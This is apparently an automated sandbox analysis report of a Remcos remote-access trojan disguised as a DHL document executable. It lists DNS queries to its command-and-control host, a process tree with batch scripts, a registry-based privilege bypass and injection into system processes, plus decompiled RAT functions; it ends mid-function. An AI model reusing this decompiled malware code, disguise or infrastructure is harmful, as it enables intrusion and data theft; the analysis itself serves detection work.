                            Sep 27, 2021 20:41:30.956043959 CEST8.8.8.8192.168.2.40x29bNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:33.111673117 CEST8.8.8.8192.168.2.40xf9b9No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:35.228498936 CEST8.8.8.8192.168.2.40x7da5No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:37.337399006 CEST8.8.8.8192.168.2.40x2de7No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:39.455291986 CEST8.8.8.8192.168.2.40xf6a1No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:41.570872068 CEST8.8.8.8192.168.2.40xc97dNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:43.690537930 CEST8.8.8.8192.168.2.40xdadcNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:45.808367014 CEST8.8.8.8192.168.2.40xc1b1No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:48.047791004 CEST8.8.8.8192.168.2.40x4ee2No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:50.166790962 CEST8.8.8.8192.168.2.40xd265No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:52.277652025 CEST8.8.8.8192.168.2.40x5e9bNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:54.386415005 CEST8.8.8.8192.168.2.40x88b9No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:56.493730068 CEST8.8.8.8192.168.2.40xd752No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:58.606566906 CEST8.8.8.8192.168.2.40x14d1No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:06.612971067 CEST8.8.8.8192.168.2.40x1b36No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:08.729338884 CEST8.8.8.8192.168.2.40x346aNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:10.839230061 CEST8.8.8.8192.168.2.40xfb67No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)

                            Code Manipulations

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            Analysis Process: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe PID: 6548 Parent PID: 5324

                            General

                            Start time:20:39:57
                            Start date:27/09/2021
                            Path:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low

                            Chronological Activities

                            Analysis Process: mobsync.exe PID: 1368 Parent PID: 6548

                            General

                            Start time:20:40:20
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\mobsync.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\mobsync.exe
                            Imagebase:0x9d0000
                            File size:93184 bytes
                            MD5 hash:44C19378FA529DD88674BAF647EBDC3C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:moderate

                            Chronological Activities

                            Analysis Process: cmd.exe PID: 7156 Parent PID: 6548

                            General

                            Start time:20:40:25
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: conhost.exe PID: 5192 Parent PID: 7156

                            General

                            Start time:20:40:25
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: cmd.exe PID: 6852 Parent PID: 7156

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: conhost.exe PID: 1852 Parent PID: 6852

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: cmd.exe PID: 5048 Parent PID: 6548

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: conhost.exe PID: 5744 Parent PID: 5048

                            General

                            Start time:20:40:27
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: reg.exe PID: 1680 Parent PID: 5048

                            General

                            Start time:20:40:27
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg delete hkcu\Environment /v windir /f
                            Imagebase:0x310000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: conhost.exe PID: 5508 Parent PID: 1680

                            General

                            Start time:20:40:28
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: Iqzenco.exe PID: 7112 Parent PID: 3424

                            General

                            Start time:20:40:31
                            Start date:27/09/2021
                            Path:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Antivirus matches:
                            • Detection: 24%, ReversingLabs

                            Chronological Activities

                            Analysis Process: Iqzenco.exe PID: 484 Parent PID: 3424

                            General

                            Start time:20:40:39
                            Start date:27/09/2021
                            Path:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi

                            Chronological Activities

                            Analysis Process: mobsync.exe PID: 4108 Parent PID: 7112

                            General

                            Start time:20:40:59
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\mobsync.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\mobsync.exe
                            Imagebase:0x9d0000
                            File size:93184 bytes
                            MD5 hash:44C19378FA529DD88674BAF647EBDC3C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, Author: Joe Security

                            Chronological Activities

                            Analysis Process: secinit.exe PID: 6644 Parent PID: 484

                            General

                            Start time:20:41:16
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\secinit.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\secinit.exe
                            Imagebase:0xb40000
                            File size:9728 bytes
                            MD5 hash:174A363BB5A2D88B224546C15DD10906
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, Author: Joe Security

                            Chronological Activities

                            Disassembly

                            Code Analysis

                            Reset < >

                              Analysis Process: mobsync.exe PID: 1368 Parent PID: 6548 mobsync.exeCOMMON

                              Executed Functions

                              Function 0040D072, Relevance: 84.1, APIs: 28, Strings: 20, Instructions: 98libraryloaderCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040D072() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x46bd2c = _t2;
				if(_t2 == 0) {
					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x46bd20 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x46bd2c == 0) {
					 *0x46bd20 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x46bd28 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x46bd14 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x46bd24 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x46bd18 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x46bd1c = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46bd10 = _t24;
				return _t24;
			}






                              0x0040d085
                              0x0040d08e
                              0x0040d096
                              0x0040d09d
                              0x0040d0ae
                              0x0040d0ae
                              0x0040d0c9
                              0x0040d0ce
                              0x0040d0df
                              0x0040d0df
                              0x0040d0fd
                              0x0040d111
                              0x0040d125
                              0x0040d139
                              0x0040d14d
                              0x0040d161
                              0x0040d175
                              0x0040d189
                              0x0040d19a
                              0x0040d1a2
                              0x0040d1a6
                              0x0040d1ac

                              APIs
                              • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Remcos-8VTGWT,00000001,0040C86E), ref: 0040D085
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D08E
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040D0A9
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0AC
                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040D0BD
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0C0
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040D0DA
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0DD
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040D0EE
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0F1
                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040D102
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D105
                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040D116
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D119
                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040D12A
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D12D
                              • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040D13E
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D141
                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040D152
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D155
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040D166
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D169
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040D17A
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D17D
                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040D18E
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D191
                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040D19F
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D1A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: AddressProc$HandleModule$LibraryLoad
                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$Remcos-8VTGWT$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                              • API String ID: 551388010-3342178377
                              • Opcode ID: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
                              • Instruction ID: 029b01f258c961e34356c9f3640987a8bc8548ac7ec401a199099fba32c80220
                              • Opcode Fuzzy Hash: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
                              • Instruction Fuzzy Hash: 10218EA0E8035875DA20BBB66C4DE1B2E58DA84B957214C27F205D7191FBFCC5408FAF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040D455, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E0040D455() {
				signed int _v32;
				void* _t13;
				void* _t22;
				signed int _t61;
				void* _t63;
				void* _t64;
				void* _t66;

				_t63 = (_t61 & 0xfffffff8) - 0x20;
				while(1) {
					_v32 = _v32 & 0x00000000;
					_t52 = L00401F75(0x46c518);
					E00410275(_t10, "override",  &_v32);
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_push(1);
						_t67 = _t63 - 0x18;
						E00407352(0x46c500, _t63 - 0x18, _t52, __eflags, 0x46c500);
						_push(L"pth_unenc");
						L0041053C(0x80000001, L00401ECB(L00416C32( &_v32, 0x46c518)));
						L00401ED0();
						_push(1);
						E00402064(0x46c500, _t67 + 0x20 - 0x18, "3.1.5 Pro");
						_push("v");
						E00410497(0x46c518, L00401F75(0x46c518));
						L0040FB4B();
						ExitProcess(0);
					}
					_t74 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8); // executed
						continue;
					}
					E0040B107();
					L5:
					_push(1);
					_t64 = _t63 - 0x18;
					E00407352(0x46c500, _t64, _t52, _t74, 0x46c500);
					_push(L"pth_unenc");
					L0041053C(0x80000001, L00401ECB(L00416C32( &_v32, 0x46c518)));
					L00401ED0();
					_push(1);
					_t66 = _t64 + 0x20 - 0x18;
					E00402064(0x46c500, _t66, "3.1.5 Pro");
					_push("v");
					E00410497(0x46c518, L00401F75(0x46c518));
					_t63 = _t66 + 0x20;
					goto L6;
				}
			}










                              0x0040d45b
                              0x0040d46a
                              0x0040d46a
                              0x0040d480
                              0x0040d482
                              0x0040d48d
                              0x0040d490
                              0x00000000
                              0x00000000
                              0x0040d492
                              0x0040d495
                              0x0040d514
                              0x0040d516
                              0x0040d51c
                              0x0040d521
                              0x0040d53f
                              0x0040d54b
                              0x0040d550
                              0x0040d55c
                              0x0040d561
                              0x0040d56f
                              0x0040d577
                              0x0040d57e
                              0x0040d57e
                              0x0040d497
                              0x0040d49a
                              0x0040d504
                              0x0040d509
                              0x00000000
                              0x0040d509
                              0x0040d49c
                              0x0040d4a1
                              0x0040d4a1
                              0x0040d4a3
                              0x0040d4a9
                              0x0040d4ae
                              0x0040d4cc
                              0x0040d4d8
                              0x0040d4dd
                              0x0040d4df
                              0x0040d4e9
                              0x0040d4ee
                              0x0040d4fc
                              0x0040d501
                              0x00000000
                              0x0040d501

                              APIs
                                • Part of subcall function 00410275: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
                                • Part of subcall function 00410275: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,0046C518), ref: 004102B3
                                • Part of subcall function 00410275: RegCloseKey.ADVAPI32(?), ref: 004102BE
                              • Sleep.KERNELBASE(00000BB8), ref: 0040D509
                              • ExitProcess.KERNEL32 ref: 0040D57E
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseExitOpenProcessQuerySleepValue
                              • String ID: 3.1.5 Pro$override$pth_unenc
                              • API String ID: 2281282204-3883831071
                              • Opcode ID: 29420b97a785fce57d285b6ed9cf5307563a7d9f490bfda752ec87826d6889d0
                              • Instruction ID: c40a5223718f3a957b604b9da94b8c1faed2f64ca342b4f7b91d7ee91612d3b8
                              • Opcode Fuzzy Hash: 29420b97a785fce57d285b6ed9cf5307563a7d9f490bfda752ec87826d6889d0
                              • Instruction Fuzzy Hash: F221F371F4030027D608BAB68D57B6E3556ABC0718F50443EF9026B2D2FEBD9A44879F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004166F6, Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E004166F6(void* __ecx, void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v36;
				char _v60;
				char _v92;
				short _v604;
				void* _t26;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_v8 = 0x10;
				_t38 = __ecx;
				 *0x46beb0(1,  &_v92,  &_v8);
				_v12 = 0x100;
				GetUserNameW( &_v604,  &_v12); // executed
				E00403086(_t26, _t38, E004043E5(_t26,  &_v36,  &_v92, _t39, E0040425F(_t26,  &_v60, "/")), __edi, _t39,  &_v604);
				L00401ED0();
				L00401ED0();
				return _t38;
			}












                              0x004166f6
                              0x00416703
                              0x0041670e
                              0x00416713
                              0x0041671c
                              0x0041672b
                              0x00416756
                              0x0041675f
                              0x00416767
                              0x00416772

                              APIs
                              • GetComputerNameExW.KERNEL32(00000001,?,?,0046C578), ref: 00416713
                              • GetUserNameW.ADVAPI32(?,00000028), ref: 0041672B
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Name$ComputerUser
                              • String ID:
                              • API String ID: 4229901323-0
                              • Opcode ID: a0a78a95647ba6d33f124e1c227be0da667ae1d808a1bc5b8e78583460369bcc
                              • Instruction ID: 2614f2d36f30314c3128fc669825ed4f87fcc606c6fc04f15beb21360d1ce151
                              • Opcode Fuzzy Hash: a0a78a95647ba6d33f124e1c227be0da667ae1d808a1bc5b8e78583460369bcc
                              • Instruction Fuzzy Hash: E201FB7290021CABCB14EBD1DC45AEEB77CEF44305F10016AF905B31A5EEB46B898BD9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0042F1CD, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0042F1CD() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0042F1D9); // executed
				return _t1;
			}




                              0x0042f1d2
                              0x0042f1d8

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F1D9,0042EF00), ref: 0042F1D2
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
                              • Instruction ID: cbbfc4c934c794425517924e3dd5babbab0d2174eef7e37b5e0b749d7271a00e
                              • Opcode Fuzzy Hash: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
                              • Instruction Fuzzy Hash:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040C641, Relevance: 60.3, APIs: 16, Strings: 18, Instructions: 769synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E0040C641(void* __edx, void* __eflags, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t69;
				void* _t76;
				void** _t83;
				void* _t87;
				CHAR* _t90;
				long _t92;
				int _t94;
				char _t97;
				void* _t98;
				void* _t102;
				void* _t118;
				void* _t119;
				char _t127;
				char* _t129;
				signed char* _t131;
				signed char* _t133;
				void* _t136;
				void* _t138;
				void* _t152;
				void* _t155;
				intOrPtr _t157;
				void* _t158;
				CHAR* _t174;
				intOrPtr* _t177;
				void* _t179;
				void* _t185;
				char* _t188;
				void* _t191;
				char* _t195;
				void* _t202;
				signed short* _t206;
				void* _t207;
				void* _t208;
				signed int _t209;
				void* _t215;
				CHAR* _t221;
				void* _t223;
				char* _t226;
				char* _t228;
				intOrPtr* _t230;
				void* _t232;
				intOrPtr* _t237;
				intOrPtr* _t241;
				void* _t243;
				void* _t251;
				void* _t262;
				void* _t265;
				struct _SECURITY_ATTRIBUTES* _t266;
				int _t269;
				char* _t352;
				signed int _t374;
				signed int _t378;
				int _t380;
				signed int _t386;
				signed int _t389;
				intOrPtr _t419;
				void* _t429;
				void* _t431;
				signed int _t447;
				void* _t450;
				char* _t457;
				void* _t458;
				char* _t461;
				void* _t463;
				void* _t468;
				char* _t473;
				intOrPtr* _t477;
				void* _t480;
				void* _t481;
				void* _t482;
				signed int _t488;
				void* _t491;
				void* _t492;
				void* _t493;
				void* _t495;
				void* _t501;
				void* _t502;

				_t440 = __edx;
				_push(_t265);
				L0040CFBE( &_v724, __edx, __eflags);
				_t491 = (_t488 & 0xfffffff8) - 0x2f4;
				E004020CC(_t265, _t491, __edx, __eflags, 0x46c59c);
				_t492 = _t491 - 0x18;
				E004020CC(_t265, _t492, __edx, __eflags,  &_v728);
				_t69 = L00416DD0( &_v756, __edx);
				_t493 = _t492 + 0x30;
				L0040D7F8(__edx, _t69);
				L00401E54( &_v760, __edx);
				_t281 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t457 = 0x46c578;
					__eflags =  *((char*)(L00401F75(L00401E29(0x46c578, _t440, __eflags, 3))));
					 *0x46bb05 = __eflags != 0;
					_t76 = E0040530D(_t265,  &_v756, L004075E8( &_v780, "Software\\", __eflags, L00401E29(0x46c578, _t440, __eflags, 0xe)), 0x46c578, __eflags, 0x45f6c4);
					_t467 = 0x46c518;
					L00401FB1(0x46c518, _t75, 0x46c518, _t76);
					L00401FA7();
					L00401FA7();
					_t266 = 0;
					L00401E29(0x46c578, _t75, __eflags, 0x32);
					__eflags =  *(E004051EA(0));
					 *0x46bd4e = __eflags != 0;
					L00401E29(0x46c578, _t75, __eflags, 0x33);
					_t83 = E004051EA(0);
					__eflags =  *_t83;
					 *0x46bd4f =  *_t83 != 0;
					__eflags =  *0x46bd4e - _t266; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t266;
						_t468 = OpenMutexA(0x100000, _t266, "Remcos_Mutex_Inj");
						__eflags = _t468;
						if(_t468 != 0) {
							WaitForSingleObject(_t468, 0xea60);
							CloseHandle(_t468);
						}
						_t443 = L00401F75(0x46c518); // executed
						_t87 = E00410275(_t86, "Inj",  &_v776); // executed
						__eflags = _t87;
						if(__eflags != 0) {
							_t443 = L00401F75(0x46c518);
							L004106D2(_t256, __eflags, "Inj");
						}
						L00401F8D(0x46c548, L00401E29(_t457, _t443, __eflags, 0xe));
						_t90 = L00401F75(0x46c548);
						_t458 = 0;
						_t269 = 1;
						CreateMutexA(0, 1, _t90); // executed
						_t92 = GetLastError();
						__eflags = _t92 - 0xb7;
						if(_t92 == 0xb7) {
							L45:
							L00401FA7();
							_t94 = _t269;
							goto L5;
						} else {
							E0040D072();
							GetModuleFileNameW(0, "C:\Windows\SysWOW64\mobsync.exe", 0x104);
							_t97 = L00416F6C(0x46c548);
							_push(0x46c548);
							_t444 = 0x80000002;
							 *0x46beb4 = _t97;
							_t98 = E004102D2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
							_t495 = _t493 + 0xc;
							L00401FB1(0x46c5b4, 0x80000002, 0x46c5b4, _t98);
							L00401FA7();
